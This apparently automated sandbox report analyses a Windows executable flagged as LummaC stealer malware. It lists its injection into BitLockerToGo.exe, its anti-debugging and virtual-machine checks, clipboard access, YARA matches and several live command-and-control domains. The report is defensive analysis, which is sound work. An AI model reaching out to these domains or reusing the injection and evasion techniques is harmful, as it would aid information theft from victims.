Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02B07400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_02B07400

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02B07400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_02B07400

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B0E468	4_2_02B0E468
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B0DEE8	4_2_02B0DEE8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AED26A	4_2_02AED26A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B0D240	4_2_02B0D240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD13B8	4_2_02AD13B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD131E	4_2_02AD131E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD8340	4_2_02AD8340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AEE35A	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17090	4_2_02B17090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFB0D7	4_2_02AFB0D7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02ADB030	4_2_02ADB030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFC007	4_2_02AFC007
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD1000	4_2_02AD1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFA070	4_2_02AFA070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B071B0	4_2_02B071B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B1618A	4_2_02B1618A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFC1CD	4_2_02AFC1CD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B18120	4_2_02B18120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B056B0	4_2_02B056B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD36A0	4_2_02AD36A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD979A	4_2_02AD979A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B19720	4_2_02B19720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AE076F	4_2_02AE076F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B185A2	4_2_02B185A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AF658F	4_2_02AF658F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02ADA510	4_2_02ADA510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17570	4_2_02B17570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AECA10	4_2_02AECA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17BB0	4_2_02B17BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AF7BA6	4_2_02AF7BA6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02ADABA0	4_2_02ADABA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFDB9C	4_2_02AFDB9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD6BF0	4_2_02AD6BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02ADBB40	4_2_02ADBB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B156C9	4_2_02B156C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02ADC810	4_2_02ADC810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B13840	4_2_02B13840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD79A0	4_2_02AD79A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17E90	4_2_02B17E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD4E50	4_2_02AD4E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD6FA0	4_2_02AD6FA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD9FC0	4_2_02AD9FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AE0F20	4_2_02AE0F20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AD8DA0	4_2_02AD8DA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFDD67	4_2_02AFDD67
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B12DE0	4_2_02B12DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B00DD0	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17D00	4_2_02B17D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02AFDD67	4_2_02AFDD67
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B17D6B	4_2_02B17D6B

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02ADC620 appears 43 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02ADE8C0 appears 132 times

Source: p37SE6gM52.exe

Static PE information: Number of sections : 12 > 10

Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
Source: p37SE6gM52.exe, 00000001.00000000.1325186248.00007FF6FD5EE000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDisplayTool.exe8 vs p37SE6gM52.exe
Source: p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
Source: p37SE6gM52.exe	Binary or memory string: OriginalFilenameDisplayTool.exe8 vs p37SE6gM52.exe

Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@2/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02B0DE76 CoCreateInstance,GetVolumeInformationW,

4_2_02B0DE76

Source: C:\Users\user\Desktop\p37SE6gM52.exe

File created: C:\Users\Public\Libraries\dbncj.scif

Jump to behavior

Source: p37SE6gM52.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\p37SE6gM52.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: p37SE6gM52.exe

ReversingLabs: Detection: 52%

Source: p37SE6gM52.exe	String found in binary or memory: pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero p
Source: p37SE6gM52.exe	String found in binary or memory: pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero p
Source: p37SE6gM52.exe	String found in binary or memory: (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not ot
Source: p37SE6gM52.exe	String found in binary or memory: (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not ot
Source: p37SE6gM52.exe	String found in binary or memory: rom deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop
Source: p37SE6gM52.exe	String found in binary or memory: rom deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop
Source: p37SE6gM52.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: p37SE6gM52.exe	String found in binary or memory: net/addrselect.go
Source: p37SE6gM52.exe	String found in binary or memory: error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated ... omitting case_not_founddata_exceptiongrouping_errorquery_canceledadmin_shutdowncrash_shutdownundefined_fileduplicate_filefdw_no_schemasinternal_errordata_corruptedpos
Source: p37SE6gM52.exe	String found in binary or memory: ifRmlZMLlG/load.go
Source: p37SE6gM52.exe	String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT for type trim_errorPGPASSFILEkrbsrvname READ ONLYdecode: %sConnectionlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityconnectionequivalentHost: %s
Source: p37SE6gM52.exe	String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
Source: p37SE6gM52.exe	String found in binary or memory: too many Questions to pack (>65535)transform: short destination buffermime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largemlkem768: crypto/rand Read failed: mlkem768: invalid ciphertext lengthcbor: invalid ByteSliceLaterFormat P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitymissing EncodeTime in EncoderConfigcannot create scope info metric: %wmanual reader: invalid producer: %Tduplicate list-member in tracestatetoo many list-members in tracestatego.opentelemetry.io/otel/sdk/tracerdelimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messageflate: corrupt input before offset range can only initialize variablesexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vcannot use an unfiltered option: %vambiguous set of applicable optionschacha20: output smaller than inputGOMEMLIMIT is already set, skippingprocess.runtime.go.mem.heap_objectsprocess.runtime.go.mem.live_objectsAGGREGATION_TEMPORALITY_UNSPECIFIEDno ErrorHandler delegate configuredprocess_network_receive_bytes_totalgrpc.internal.transport.networktypethere is an empty key in the headerGRPC_ALTS_MAX_CONCURRENT_HANDSHAKES%s: none of the oneof fields is setcrypto/cipher: input not full blocksTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't alignreflect.Value.Equal: values of type strings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)Error parsing certificate from ASN.1accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: p37SE6gM52.exe	String found in binary or memory: too many Questions to pack (>65535)transform: short destination buffermime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largemlkem768: crypto/rand Read failed: mlkem768: invalid ciphertext lengthcbor: invalid ByteSliceLaterFormat P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitymissing EncodeTime in EncoderConfigcannot create scope info metric: %wmanual reader: invalid producer: %Tduplicate list-member in tracestatetoo many list-members in tracestatego.opentelemetry.io/otel/sdk/tracerdelimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messageflate: corrupt input before offset range can only initialize variablesexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vcannot use an unfiltered option: %vambiguous set of applicable optionschacha20: output smaller than inputGOMEMLIMIT is already set, skippingprocess.runtime.go.mem.heap_objectsprocess.runtime.go.mem.live_objectsAGGREGATION_TEMPORALITY_UNSPECIFIEDno ErrorHandler delegate configuredprocess_network_receive_bytes_totalgrpc.internal.transport.networktypethere is an empty key in the headerGRPC_ALTS_MAX_CONCURRENT_HANDSHAKES%s: none of the oneof fields is setcrypto/cipher: input not full blocksTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't alignreflect.Value.Equal: values of type strings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)Error parsing certificate from ASN.1accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: p37SE6gM52.exe	String found in binary or memory: net/addrselect.go
Source: p37SE6gM52.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: p37SE6gM52.exe	String found in binary or memory: google.golang.org/grpc@v1.67.0/internal/balancerload/load.go
Source: p37SE6gM52.exe	String found in binary or memory: ifRmlZMLlG/load.go

Source: C:\Users\user\Desktop\p37SE6gM52.exe

File read: C:\Users\user\Desktop\p37SE6gM52.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\p37SE6gM52.exe "C:\Users\user\Desktop\p37SE6gM52.exe"
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\p37SE6gM52.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: p37SE6gM52.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: p37SE6gM52.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: p37SE6gM52.exe

Static file information: File size 19140096 > 1048576

Source: p37SE6gM52.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x859400
Source: p37SE6gM52.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x900a00

Source: p37SE6gM52.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp

Source: p37SE6gM52.exe

Static PE information: section name: .xdata

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B04EA8 push es; mov dword ptr [esp], eax		4_2_02B04EB1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02B20C14 push ebx; ret		4_2_02B20C15

Source: C:\Users\user\Desktop\p37SE6gM52.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7804

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: p37SE6gM52.exe, 00000001.00000002.1726573970.000002762971C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

API call chain: ExitProcess graph end node

graph_4-19745

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02B15510 LdrInitializeThunk,

4_2_02B15510

Source: C:\Users\user\Desktop\p37SE6gM52.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\p37SE6gM52.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\p37SE6gM52.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: covvercilverow.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: surroundeocw.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: abortinoiwiam.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pumpkinkwquo.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: priooozekw.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deallyharvenw.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: defenddsouneuw.shop
Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: racedsuitreow.shop
